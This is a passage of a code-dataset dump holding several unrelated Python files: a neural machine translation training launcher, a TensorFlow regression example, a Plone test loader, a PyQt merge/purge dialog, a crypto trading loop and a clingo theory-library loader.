8\nACCUM_COUNT = 4\nLEARNING_RATE = 2\nDROPOUT_RATE = 
0.1\nATTENTION_DROPOUT_RATE = 0.1\nLABEL_SMOOTHING = 0.1\nTRAIN_EPOCHS = 2000\nWARMUP_STEPS = 500\n\n\nif __name__ == \"__main__\":\n training_set_sizes = [1000,5000,10000,25000,50000,100000,1000000]\n training_set_sizes = [1000000]\n \n for training_set_size in training_set_sizes:\n print(\"### TRAINING MODEL - INFORMATION ###\")\n print(\"Random seed: \" + str(RANDOM_SEED))\n print(\"Training epochs: \" + str(TRAIN_EPOCHS))\n print(\"Warmup steps: \" + str(WARMUP_STEPS))\n print(\"RNN size: \" + str(RNN_SIZE))\n print(\"WordVec size: \" + str(WORD_VEC_SIZE))\n print(\"Dataset size: \" + str(training_set_size))\n print(\"Number of layers: \" + str(NUM_LAYERS))\n print(\"Number of heads: \" + str(NUM_HEADS))\n print(\"Size of hidden transformer feed-forward layer: \" + str(TRANSFORMER_FF))\n print(\"Batch size: \" + str(BATCH_SIZE))\n print(\"Accum count: \" + str(ACCUM_COUNT))\n print(\"Learning rate: \" + str(LEARNING_RATE))\n print(\"Dropout rate: \" + str(DROPOUT_RATE))\n print(\"Attention dropout rate: \" + str(ATTENTION_DROPOUT_RATE))\n print(\"Label smoothing: \" + str(LABEL_SMOOTHING))\n print(\"####################################\")\n\n\n trainingDataSaveDir = \"../Data/TrainingData/HumanMine/\" + str(training_set_size) + \"/\"\n\n # Using pre-trained word embeddings \n OpenNMTcmd = 'onmt_train -data ' + str(trainingDataSaveDir) \\\n + 'dataset -save_model ./Models/model-HumanMine-' + str(training_set_size) \\\n + ' --layers ' + str(NUM_LAYERS) + ' -heads ' + str(NUM_HEADS) + ' -rnn_size ' + str(RNN_SIZE) + ' -word_vec_size ' + str(WORD_VEC_SIZE) + ' -transformer_ff ' + str(TRANSFORMER_FF) + ' -max_generator_batches 2 -seed ' + str(RANDOM_SEED) + ' -batch_size ' + str(BATCH_SIZE) + ' -valid_batch_size ' + str(VALID_BATCH_SIZE) + ' -accum_count ' + str(ACCUM_COUNT) + ' -optim adam -adam_beta2 0.998 -encoder_type transformer -max_grad_norm 0 -decoder_type transformer -position_encoding -param_init_glorot -param_init 0 -batch_type tokens -decay_method noam -learning_rate ' + str(LEARNING_RATE) + ' -normalization tokens -train_steps ' \\\n + str(TRAIN_EPOCHS) + ' -pre_word_vecs_enc ' + str(trainingDataSaveDir) + 'embeddings.enc.pt -pre_word_vecs_dec ' + str(trainingDataSaveDir) + 'embeddings.dec.pt -valid_steps 100 -save_checkpoint_steps 500 -report_every 50 -dropout ' + str(DROPOUT_RATE) + ' -attention_dropout ' + str(ATTENTION_DROPOUT_RATE) + ' -label_smoothing ' + str(LABEL_SMOOTHING) + ''\n \n #print(OpenNMTcmd)\n\n process = subprocess.Popen(OpenNMTcmd, shell=True, stderr=subprocess.STDOUT)\n process.wait()\n","sub_path":"NLP/TrainModels.py","file_name":"TrainModels.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390152744","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 9 17:10:28 2019\n\n@author: vigupta\n\"\"\"\n\n# Basic calculations with tensorflow \n\nimport tensorflow as tf\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt \n\nlearning_rate = 0.01 \ntraining_epochs = 2000\noptimizer_ctor = tf.train.GradientDescentOptimizer\ndisplay_step = 50 \n\ndata = np.matrix(pd.read_csv(\"linreg-multi-synthetic-2.csv\", header=None).values)\n\n#transpose just so that we get a matrix of shape nxm, m : # of samples \ntrain_X = data[:,0:2].T\ntrain_Y = data[:,2].T\nprint(train_X.shape)\nprint(train_Y.shape)\n\n#dimensions \nn=train_X.shape[0]\nm=train_X.shape[1]\n#lets work on the computation graph: \n\nX = tf.placeholder(shape = (n, None), name = 
\"X\", dtype = \"float32\")\nY = tf.placeholder(shape = (1, None), name=\"Y\", dtype = \"float32\")\n#The training variables \n#Wt1 = tf.get_variable(name = \"Wt1\", shape = (1, n))\n#bias1 = tf.get_variable(name = \"bias1\", shape = ())\n\nA= tf.add(tf.matmul(Wt1, X), bias1)\n\ncost = tf.reduce_sum(tf.pow(A-Y, 2))/(2*m)\noptimizer = optimizer_ctor(learning_rate).minimize(cost)\ntraining_costs=[]\n\nlog_name = \"%g, %s\" % (learning_rate, optimizer_ctor.__name__)\ntf.summary.scalar('C', cost)\nsummary_node = tf.summary.merge_all()\nsummary_writer = tf.summary.FileWriter(log_name)\nprint(\"Open log file with tensorboard\")\n\n#Run the initiliazer first \ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess: \n sess.run(init)\n print(\"Starting, W\" ,sess.run(Wt1))\n \n for epoch in range(training_epochs):\n c = sess.run(optimizer, feed_dict = {X:train_X, Y:train_Y})\n #summary_writer.add_summary(c)\n \n if epoch % display_step == 0:\n c = sess.run(cost, feed_dict = {X:train_X, Y:train_Y})\n training_costs.append(c)\n print (\"Epoch:\", '%04d' % (epoch), \"cost=\", \"{:.9f}\".format(c), \\\n \"W=\", sess.run(Wt1), \"b=\", sess.run(bias1))\n print (\"Epochs exhausted. Quitting the optimization !\")\n training_cost = sess.run(cost, feed_dict={X: train_X, Y: train_Y}) \n print (\"Training cost=\", training_cost, \"W=\", sess.run(Wt1), \"b=\", sess.run(bias1), '\\n')\n \nplt.plot(training_costs)\nplt.show()","sub_path":"Tensorflow-basics/MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"342955014","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/hvelarde/forcontent/idg/src/brasil.gov.portal/src/brasil/gov/portal/tests/test_robot.py\n# Compiled at: 2018-06-11 09:46:53\nfrom brasil.gov.portal.testing import ACCEPTANCE_TESTING\nfrom plone.testing import layered\nimport os, robotsuite, unittest\nnoncritical = [\n 'Expected Failure']\n\ndef test_suite():\n suite = unittest.TestSuite()\n current_dir = os.path.abspath(os.path.dirname(__file__))\n robot_dir = os.path.join(current_dir, 'robot')\n tests = [ os.path.join('robot', doc) for doc in os.listdir(robot_dir) if doc.endswith('.robot') and doc.startswith('test_') and 'acessibilidade' not in doc\n ]\n for test in tests:\n suite.addTests([\n layered(robotsuite.RobotTestSuite(test, noncritical=noncritical), layer=ACCEPTANCE_TESTING)])\n\n return suite","sub_path":"pycfiles/brasil.gov.portal-2.1.1-py2-none-any/test_robot.py","file_name":"test_robot.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353599477","text":"\"\"\"\nMIT License\n\nCopyright (c) 2016 Zeke Barge\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED 
\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport os\nfrom functools import partial\nfrom core.compat import QtGui, QtCore\nimport pandas as pd\nfrom qtpandas.models.DataFrameModel import DataFrameModel\nfrom core.ui.actions.merge_purge_ui import Ui_MergePurgeDialog\nfrom core.views.actions.push_grid import PushGridHandler, PushGridWidget\nfrom core.models.actions import FileViewModel\nfrom core.views.file import FileTableWindow\nfrom core.views.actions.map_grid import MapGridDialog\nfrom core.ctrls.dataframe import DataFrameModelManager\nfrom core.utility.widgets import create_standard_item_model\nfrom core.utility.pandatools import gather_frame_fields\n\n\nclass MergePurgeDialog(QtGui.QDialog, Ui_MergePurgeDialog):\n signalMergeFileOpened = QtCore.Signal(str) # file path\n signalSFileOpened = QtCore.Signal(str) # file path\n signalExecuted = QtCore.Signal(str, str, str) # source_path, dest_path, report_path\n\n def __init__(self, df_manager: DataFrameModelManager, parent=None, source_model=None):\n self.df_manager = df_manager\n QtGui.QDialog.__init__(self, parent)\n self.setupUi(self)\n self.source_model = source_model\n self._merge_view_model = FileViewModel()\n self._suppress_view_model = FileViewModel()\n self._suppress_files = {}\n self._merge_files = {}\n self._file_table_windows = {}\n self._field_map_grids = {}\n self._field_map_data = {}\n self.sortAscHandler = None\n self.sortOnHandler = None\n self.dedupeOnHandler = None\n self.uniqueFieldsHandler = None\n self.gatherFieldsHandler = None\n\n def configure(self, source_path=None, dest_path=None) -> bool:\n\n if source_path is None:\n source_path = self.sourcePathLineEdit.text()\n assert os.path.exists(source_path), \"source_path cannot be None, set \".format(source_path)\n self.set_line_edit_paths(source_path, dest_path=dest_path)\n if self.sortAscHandler is None:\n self.set_handler_sort_asc()\n\n self.signalMergeFileOpened.connect(self.add_merge_file)\n merge_file_func = partial(self.open_file, model_signal=self.signalMergeFileOpened)\n self.btnAddMergeFile.clicked.connect(merge_file_func)\n self.btnBrowseMergeFile.clicked.connect(merge_file_func)\n self.btnDeleteMergeFile.clicked.connect(partial(self.remove_file, self.mergeFileTable))\n self.btnEditMergeFile.clicked.connect(partial(self.open_edit_file_window, self.mergeFileTable, self._merge_files))\n self.mergeFileTable.setModel(self._merge_view_model)\n\n self.signalSFileOpened.connect(self.add_suppress_file)\n sfile_func = partial(self.open_file, model_signal=self.signalSFileOpened)\n self.btnEditSFile.clicked.connect(partial(self.open_edit_file_window, self.sFileTable, self._suppress_files))\n self.btnDeleteSFile.clicked.connect(partial(self.remove_file, self.sFileTable))\n self.btnAddSFile.clicked.connect(sfile_func)\n self.btnBrowseSFile.clicked.connect(sfile_func)\n self.sFileTable.setModel(self._suppress_view_model)\n self.btnMapSFields.clicked.connect(partial(self.open_field_map, self.sFileTable, self._suppress_files))\n self.btnMapMergeFields.clicked.connect(partial(self.open_field_map, self.mergeFileTable, self._merge_files))\n 
self.btnExecute.clicked.connect(self.execute)\n\n def set_source_model(self, model=None, configure=False):\n if not isinstance(model, DataFrameModel):\n if model is None:\n model = self.sourcePathLineEdit.text()\n if isinstance(model, str) and os.path.exists(model):\n model = self.df_manager.read_file(model)\n else:\n raise Exception(\"model parameter must be a filepath or a qtpandas.models.DataFrameModel\")\n self.source_model = model\n if configure:\n self.configure(source_path=self.source_model.filePath)\n self.set_push_grid_handlers()\n combo_model = create_standard_item_model(model.dataFrame().columns.tolist(),\n editable=False, checkable=True)\n self.primaryKeyComboBox.setModel(combo_model)\n\n def set_line_edit_paths(self, source_path, dest_path=None):\n if dest_path is None:\n dirname = os.path.dirname(source_path)\n base, ext = os.path.splitext(os.path.basename(source_path))\n dest_path = os.path.join(dirname, base + \"_merged\" + ext)\n self.sourcePathLineEdit.setText(source_path)\n self.destPathLineEdit.setText(dest_path)\n\n def set_push_grid_handlers(self, column_model=None, sorton_model=None, sortasc_model=None,\n dedupe_model=None, gather_model=None, unique_model=None):\n \"\"\"\n Sets all default push grid handlers for the dialog.\n\n :param column_model: (QStandardItemModel, default None)\n :param sorton_model: ((QStandardItemModel,list) default None)\n :param sortasc_model: ((QStandardItemModel,list) default None)\n :param dedupe_model: ((QStandardItemModel,list) default None)\n :return:\n \"\"\"\n\n if column_model is None:\n column_model = self.get_source_columns_model()\n\n self.set_handler_sort_on(column_model=None, default_model=sorton_model)\n self.set_handler_sort_asc(default_model=sortasc_model)\n self.set_handler_dedupe_on(column_model=None, default_model=dedupe_model)\n self.set_handler_gather_fields(column_model=None, default_model=gather_model)\n self.set_handler_unique_fields(column_model=None, default_model=unique_model)\n\n def set_handler_sort_on(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.sortOnHandler = PushGridHandler(left_model=column_model, left_view=self.sortOnLeftView,\n left_button=self.sortOnLeftButton,\n left_delete=True, right_model=default_model,\n right_view=self.sortOnRightView,\n right_button=self.sortOnRightButton)\n\n def set_handler_sort_asc(self, default_model=None):\n if self.sortAscHandler is None or default_model is not None:\n sort_asc = QtGui.QStandardItemModel()\n sort_asc.appendRow(QtGui.QStandardItem('True'))\n sort_asc.appendRow(QtGui.QStandardItem('False'))\n self.sortAscHandler = PushGridHandler(left_model=sort_asc, left_view=self.sortAscLeftView,\n left_button=self.sortAscLeftButton,\n left_delete=False, right_model=default_model,\n right_view=self.sortAscRightView,\n right_button=self.sortAscRightButton)\n\n def set_handler_dedupe_on(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.dedupeOnHandler = PushGridHandler(left_model=column_model, left_view=self.dedupeOnLeftView,\n left_button=self.dedupeOnLeftButton,\n left_delete=True, right_model=default_model,\n right_view=self.dedupeOnRightView,\n right_button=self.dedupeOnRightButton)\n\n def set_handler_gather_fields(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.gatherFieldsHandler = PushGridHandler(left_model=column_model,\n 
left_view=self.gatherFieldsListViewLeft,\n left_button=self.gatherFieldsButtonLeft,\n left_delete=True, right_model=default_model,\n right_view=self.gatherFieldsListViewRight,\n right_button=self.gatherFieldsButtonRight)\n\n def set_handler_unique_fields(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.uniqueFieldsHandler = PushGridHandler(left_model=column_model,\n left_view=self.uniqueFieldsListViewLeft,\n left_button=self.uniqueFieldsPushButtonLeft,\n left_delete=True, right_model=default_model,\n right_view=self.uniqueFieldsListViewRight,\n right_button=self.uniqueFieldsPushButtonRight)\n\n def get_source_columns_model(self ,raise_on_error=True):\n if self.source_model is None:\n if raise_on_error:\n raise Exception(\"Cannot get source_columns as source_model is None!\")\n else:\n columns = []\n else:\n columns = self.source_model.dataFrame().columns.tolist()\n\n return create_standard_item_model(columns)\n\n def open_file(self, file_names: list=None, model_signal=None):\n if file_names is None:\n file_names = QtGui.QFileDialog.getOpenFileNames(parent=self)\n #file_names = list(file_names[0])\n\n if isinstance(file_names, str):\n file_names = list(file_names)\n\n assert hasattr(file_names, \"__iter__\"), \"file_names is not iterable\"\n\n for f in file_names:\n try:\n if os.path.exists(f):\n self.df_manager.read_file(f)\n if model_signal is not None:\n model_signal.emit(f)\n print(\"Emitted signal: {}\".format(f))\n except Exception as e:\n print(e)\n\n @QtCore.Slot(str)\n def add_merge_file(self, file_path):\n model = self.df_manager.get_model(file_path)\n model.enableEditing(True)\n self._merge_files.update({file_path:model})\n self._merge_view_model.append_df_model(model)\n self.mergeFileTable.setColumnWidth(0, 500)\n\n @QtCore.Slot(str)\n def add_suppress_file(self, file_path):\n model = self.df_manager.get_model(file_path)\n model.enableEditing(True)\n self._suppress_files.update({file_path:model})\n self._suppress_view_model.append_df_model(model)\n self.sFileTable.setColumnWidth(0, 500)\n\n def remove_file(self, view, indexes=None):\n if indexes is None:\n indexes = [x.row() for x in view.selectedIndexes()]\n model = view.model()\n for idx in indexes:\n model.takeRow(idx)\n\n def open_field_map(self, view, models):\n \"\"\"\n Connects a MapGridDialog to help the user map field names that\n are different between the source DataFrameModel and the\n selected merge or suppression DataFrameModel.\n\n :param view: (QtGui.QTableView)\n The view that has a selected filepath\n :param models: (dict)\n The dictionary of {file_path:DataFrameModel} where\n dataframe columns can be gathered from.\n :return: None\n\n \"\"\"\n idx = view.selectedIndexes()[0]\n view_model = view.model()\n view_item = view_model.item(idx.row())\n view_item_text = view_item.text()\n\n try:\n self._field_map_grids[view_item_text].show()\n except KeyError:\n dfmodel = models[view_item_text]\n colmodel = dfmodel._dataFrame.columns.tolist()\n\n if self.source_model is None:\n self.set_source_model()\n\n source_colmodel = self.source_model._dataFrame.columns.tolist()\n\n fmap = MapGridDialog(parent=self)\n fmap.load_combo_box(source_colmodel, left=True)\n fmap.load_combo_box(colmodel, left=False)\n fmap.setWindowTitle(\"Map Fields\")\n fmap.labelLeft.setText(os.path.basename(self.source_model.filePath))\n fmap.labelRight.setText(os.path.basename(dfmodel.filePath))\n fmap.signalNewMapping.connect(lambda x: 
self._field_map_data.update({dfmodel.filePath: x}))\n\n self._field_map_grids[view_item_text] = fmap\n self._field_map_grids[view_item_text].show()\n\n def get_map_grid(self, file_path):\n return self._field_map_grids.get(file_path, None)\n\n def open_edit_file_window(self, view, models):\n \"\"\"\n Connects a DataFrameModel selected in the view\n to a FileTableWindow where the model can be edited.\n\n :param view: (QtGui.QTableView)\n The view that has a selected filepath\n :param models: (dict)\n The dictionary of {file_path:DataFrameModel}\n to supply the FileTableWindow\n :return: None\n \"\"\"\n idx = view.selectedIndexes()[0]\n vmodel = view.model()\n vitem = vmodel.item(idx.row())\n model = models.get(vitem.text())\n\n fp = model.filePath\n try:\n self._file_table_windows[fp].show()\n except KeyError:\n self._file_table_windows[fp] = FileTableWindow(model)\n self._file_table_windows[fp].show()\n\n def execute(self):\n \"\"\"\n Executes the merge_purge based upon the given settings.\n :return: None\n \"\"\"\n if self.source_model is None:\n self.set_source_model()\n\n suppressed_results = {}\n merged_results = {}\n source_path = self.sourcePathLineEdit.text()\n dest_path = self.destPathLineEdit.text()\n source_df = self.source_model.dataFrame().copy()\n source_df.loc[:, 'ORIG_IDXER'] = source_df.index\n source_size = source_df.index.size\n index_label = self.primaryKeyComboBox.currentText()\n\n sort_on = self.sortOnHandler.get_model_list(left=False)\n ascending = self.sortAscHandler.get_model_list(left=False)\n dedupe_on = self.dedupeOnHandler.get_model_list(left=False)\n gather_fields = self.gatherFieldsHandler.get_model_list(left=False)\n overwrite_existing = self.gatherFieldsOverWriteCheckBox.isChecked()\n\n # Make sure ascending/sort_on lists are equal.\n while len(sort_on) < len(ascending):\n ascending.append(False)\n\n while len(sort_on) > len(ascending):\n ascending.pop()\n\n # Get all merge models and merge.\n # Absorb all rows and columns\n for file_path, merge_model in self._merge_files.items():\n pre_size = source_df.index.size\n other_df = merge_model.dataFrame()\n if gather_fields:\n assert index_label in other_df.columns, \"DataFrameModel for {} missing column {}\".format(\n merge_model.filePath, index_label)\n source_df = gather_frame_fields(source_df, other_df, index_label=index_label,\n fields=gather_fields, copy_frames=True,\n append_missing=True, overwrite=overwrite_existing)\n else:\n source_df = pd.concat([source_df, other_df])\n merged_results.update({merge_model.filePath: source_df.index.size - pre_size})\n # Get all suppression models and suppress.\n for file_path, suppress_model in self._suppress_files.items():\n map_dict = self._field_map_data.get(file_path, {})\n sframe = suppress_model.dataFrame().copy()\n sframe.drop(['ORIG_IDXER'], axis=1, inplace=True, errors='ignore')\n\n if map_dict:\n # A mapping exists - rename the data and get the key_cols\n key_cols = list(map_dict.values())\n sframe.rename(columns=map_dict, inplace=True)\n else:\n # No mapping exists - Try to use the dedupe_on cols as key_cols\n key_cols = dedupe_on.copy()\n missing = [x for x in key_cols if x not in sframe.columns]\n if missing:\n raise KeyError(\"Suppression file {} must have a field mapping or \\\n have the dedupe column labels, it has neither!.\".format(\n suppress_model.filePath))\n\n sframe = sframe.loc[:, key_cols].drop_duplicates(key_cols)\n badframe = pd.merge(source_df, sframe, how='inner', left_on=key_cols, right_on=key_cols)\n source_df = 
source_df.loc[~source_df.index.isin(badframe.loc[:, 'ORIG_IDXER'].tolist()), :]\n suppressed_results.update({suppress_model.filePath: badframe.index.size})\n\n # Sort the data\n if sort_on and ascending:\n source_df.sort_values(sort_on, ascending=ascending, inplace=True)\n\n # Deduplicate the data.\n if dedupe_on:\n pre_size = source_df.index.size\n source_df.drop_duplicates(dedupe_on, inplace=True)\n dedupe_lost = pre_size - source_df.index.size\n else:\n dedupe_lost = 0\n\n # Export the data - done!\n source_df.drop(['ORIG_IDXER'], axis=1, inplace=True, errors='ignore')\n source_df.to_csv(dest_path, index=False)\n print(\"Exported: {}\".format(dest_path))\n\n merge_string = \"\\n\".join(\"Gained {} merging {}\".format(v, k) for k, v in merged_results.items())\n suppress_string = \"\\n\".join(\"Lost {} suppressing {}\".format(v, k) for k,v in suppressed_results.items())\n report = \"\"\"\n Merge Purge Report\n ==================\n Original Size: {}\n Final Size: {}\n Source Path: {}\n Output Path: {}\n\n\n Merge:\n ==================\n {}\n\n\n Purge:\n ==================\n {}\n\n\n Sort:\n ==================\n SORT BY: {}\n SORT ASCENDING: {}\n\n\n Dedupe:\n ==================\n DEDUPE ON: {}\n RECORDS LOST: {}\n\n\n\n \"\"\".format(source_size, source_df.index.size, source_path,\n dest_path, merge_string, suppress_string,\n sort_on, ascending, dedupe_on, dedupe_lost)\n\n report_path = os.path.splitext(dest_path)[0] + \"_report.txt\"\n with open(report_path, \"w\") as fh:\n fh.write(report)\n\n self.signalExecuted.emit(source_path, dest_path, report_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"zeex/core/views/actions/merge_purge.py","file_name":"merge_purge.py","file_ext":"py","file_size_in_byte":19809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"122397069","text":"import os\nimport configparser\nimport requests\nimport time\nimport datetime\nfrom Coin import Coin, State\nfrom function.get_account import get_account\nfrom function.order_stock import *\nfrom function.get_market_code import get_market_code\nfrom function.get_now_time import get_now_time\nfrom function.get_candles import get_candles\nfrom function.get_now_coin_info import get_now_coin_info\nfrom function.print_your_config import print_order_config\nfrom timeit import default_timer\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini', encoding='UTF8')\n\nVM_order_config = config['VB_ORDER']\ncandle_type: str = VM_order_config.get('CANDLE_TYPE')\nunit: int = VM_order_config.getint('MINUTE_CANDLE_UNIT')\npercent_buy_range: int = VM_order_config.getint('PERCENT_OF_BUY_RANGE')\npercent_of_buying: int = VM_order_config.getint('PERCENTS_OF_BUYING') # 추가\n\n\ndef short_volatility_strategy(coins_name: list):\n print_order_config(config.items(section=\"VB_ORDER\"))\n coin_dict = dict()\n for coin_name in coins_name:\n coin_dict[coin_name] = Coin(coin_name)\n while True:\n for coin in coin_dict.values():\n candles = get_candles('KRW-' + coin.coin_name, count=2, minute=unit)\n now = candles[0]['candle_date_time_kst']\n print(f'{get_now_time()} {coin.coin_name}({set_state_color(coin.state)})| '\n f'목표 가: {coin.buy_price:>11.2f}, 현재 가: {candles[0][\"trade_price\"]:>10}'\n f' ({set_dif_color(candles[0][\"trade_price\"], coin.buy_price)})')\n\n if coin.check_time != now:\n print(f'{coin.check_time} -> \\033[36m{now}\\033[0m')\n if coin.state == State.BOUGHT or coin.state == State.TRYBUY:\n sell_result = coin.sell_coin()\n if sell_result == \"Not 
bought\":\r\n                        print(f'\\033[100m{get_now_time()} {coin.coin_name}( ERROR)|\\033[0m')\r\n                    else:\r\n                        print(f'\\033[104m{get_now_time()} {coin.coin_name}( SELL)| '\r\n                              f'{int(get_sell_price(access_key))}\\033[0m')\r\n                        with open(\"../logs/VB_order.log\", \"a\") as f:\r\n                            f.write(f'{get_now_time()} {coin.coin_name}( SELL)| '\r\n                                    f'{int(get_sell_price(access_key))}원\\n')\r\n                if coin.state == State.TRYBUY:\r\n                    coin.cansel_buy()\r\n                    print(f'\\033[104m{get_now_time()} {coin.coin_name}( CANCEL)|\\033[0m')\r\n                coin.check_time = now\r\n                coin.variability = candles[1]['high_price'] - candles[1]['low_price']\r\n                coin.buy_price = candles[0][\"opening_price\"] + coin.variability * (percent_buy_range / 100)\r\n            else:  # the candle timestamp is unchanged\r\n                if coin.state == State.BOUGHT or coin.variability == 0:\r\n                    continue\r\n                if candles[0]['trade_price'] <= coin.buy_price:\r\n                    continue\r\n\r\n                # Buy\r\n                limit = True\r\n                buy_result = coin.buy_coin(price=10000, limit=limit)\r\n                os.makedirs('../logs', exist_ok=True)\r\n                if limit:\r\n                    print(f'\\033[95m{get_now_time()} {coin.coin_name}(TRYBUY)| '\r\n                          f'{buy_result.get(\"locked\"):>6}원\\033[0m')\r\n                    with open(\"../logs/VB_order.log\", \"a\") as f:\r\n                        f.write(f'{get_now_time()} {coin.coin_name}(TRYBUY)| '\r\n                                f'{buy_result.get(\"locked\"):>6}원\\n')\r\n                else:\r\n                    print(f'\\033[101m{get_now_time()} {coin.coin_name}( BUY)| '\r\n                          f'{int(get_buy_price(coin.coin_name))}원\\033[0m')\r\n                    with open(\"../logs/VB_order.log\", \"a\") as f:\r\n                        f.write(f'{get_now_time()} {coin.coin_name}( BUY)| '\r\n                                f'{int(get_buy_price(coin.coin_name))}원\\n')\r\n\r\n\r\ndef set_state_color(state) -> str:\r\n    if state == State.BOUGHT:\r\n        return f'\\033[91m{state.name:>6}\\033[0m'\r\n    else:\r\n        return f'{state.name:>6}'\r\n\r\n\r\ndef set_dif_color(a, b) -> str:\r\n    value = (a - b) / a * 100\r\n    if value < 0:\r\n        return f'\\033[34m{value:>6.2f}%\\033[0m'\r\n    else:\r\n        return f'\\033[31m{value:>6.2f}%\\033[0m'\r\n\r\n\r\nif __name__ == '__main__':\r\n    short_volatility_strategy(['BTC'])\r\n","sub_path":"deprecated/short_volatility_strategy.py","file_name":"short_volatility_strategy.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64256777","text":"from __future__ import print_function\nimport sys\nimport ctypes\nimport errno\nimport clingo\nimport inspect\n\ndef eprint(*args, **kwargs):\n    \"\"\"\n    Prints a warning to stderr\n    \"\"\"\n    print(*args, file=sys.stderr, **kwargs)\n\nclass Application(object):\n    \"\"\"\n    Application object as accepted by clingo.clingo_main().\n    \"\"\"\n    def __init__(self, name):\n        \"\"\"\n        Initializes the application setting the program name.\n        See clingo.clingo_main().\n        \"\"\"\n        self.program_name = name\n        self.version = \"0.1.0\"\n        self.theories = []\n        self.last_model = {}\n\n    def __del__(self):\n        for i in self.theories:\n            if len(i) > 1:\n                i[1].theory_destroy_propagator()\n\n    def theory_main(self, prg, files):\n        \"\"\"\n        This method can be overloaded, on_model and on_statistics can be reused as callbacks\n        \"\"\"\n\n    def print_model(self, model, printer):\n        \"\"\"\n        Can be overridden to specify special formatted text output\n        \"\"\"\n        printer()\n\n    \"\"\"\n    Possibilities:\n        Make my own theory symbol ->where to store\n        Convert C Symbol to Python Symbol -> how\n            from_c\n            in tloader manually using c methods of clingo_symbol_t\n        Use three char* for name, operator and value\n            use .value on the ctype to get the value of the char_p\n\n    Ideas to get the data from the propagator:\n        Write an own python propagator -> is called for every thread AFTER all registered propagators, could be a good point to 
get data of partial assignment to theory variables\n        Propagator could use check to be called after each fixpoint -> make it configurable when the update occurs\n        All propagators should be asked -> what to be asked for\n            List of variables that are (partially) assigned (getFirst/getNext)\n            For each variable, what is the current restriction\n    Problem: What is it with python multithreading\n    \"\"\"\n    def on_model(self, model):\n        \"\"\"\n        Can be used as a callback function to extend the model with theory specific information\n        \"\"\"\n        for lib in self.theories:\n            if len(lib) > 1:\n                print(\"onModel\")\n                lib[1].theory_on_model(ctypes.c_void_p(model._to_c))\n                self.last_model[lib[1]] = []\n                name = ctypes.c_char_p()\n                op = ctypes.c_char_p()\n                value = ctypes.c_char_p()\n                print(\"calling assignment_first\")\n                lib[1].theory_assignment_first(ctypes.c_uint(model.thread_id), ctypes.byref(name), ctypes.byref(op), ctypes.byref(value))\n                print(\"called assignment_first\")\n                # Only the first assignment is read here; walking all of them would need a\n                # matching \"next\" call in the theory library (see getFirst/getNext above)\n                if name.value is not None:\n                    print(name.value)\n        return True\n\n    def on_statistics(self, step, akku):\n        \"\"\"\n        Can be used as a callback function to extend the statistics with theory specific information\n        \"\"\"\n        for lib in self.theories:\n            if len(lib) > 1:\n                lib[1].theory_on_statistics(ctypes.c_void_p(step._to_c), ctypes.c_void_p(akku._to_c))\n        return True\n\n    def register_options(self, options):\n        \"\"\"\n        register all options of all theories.\n        \"\"\"\n        for lib in self.theories:\n            if len(lib) > 1:\n                lib[1].theory_add_options(ctypes.c_void_p(options._to_c))\n    def validate_options(self):\n        \"\"\"\n        validate all options of all theories.\n        \"\"\"\n        for lib in self.theories:\n            if len(lib) > 1:\n                if not lib[1].theory_validate_options():\n                    return False\n        return True\n\n    def load(self, libname):\n        \"\"\"\n        Load a theory given the dynamic library name\n        \"\"\"\n        self.theories.append([libname])\n        lib = self.theories[-1][0]\n        libname = lib\n        try:\n            import ctypes.util  # ctypes.cdll has no .util attribute; the submodule must be imported\n            libname = ctypes.util.find_library(lib)\n        except:\n            pass\n        eprint(\"Loading lib\", libname)\n        loaded = False\n        libnames = [libname, libname+\".so\", libname+\".dll\", \"lib\"+libname,\n                    \"lib\"+libname+\".so\", \"lib\"+libname+\".dll\"]\n        for s in libnames:\n            print(\"loading \" + s)\n            try:\n                loaded = ctypes.cdll.LoadLibrary(s)\n            except:\n                loaded = False\n            if loaded != False:\n                break\n        if not loaded:\n            raise IOError(errno.ENOENT, \"Library not found: \", libname)\n        self.theories[-1].append(loaded)\n        self.last_model[libname] = []\n\n    def __load_propagators(self, prg):\n        for lib in self.theories:\n            if len(lib) > 1:\n                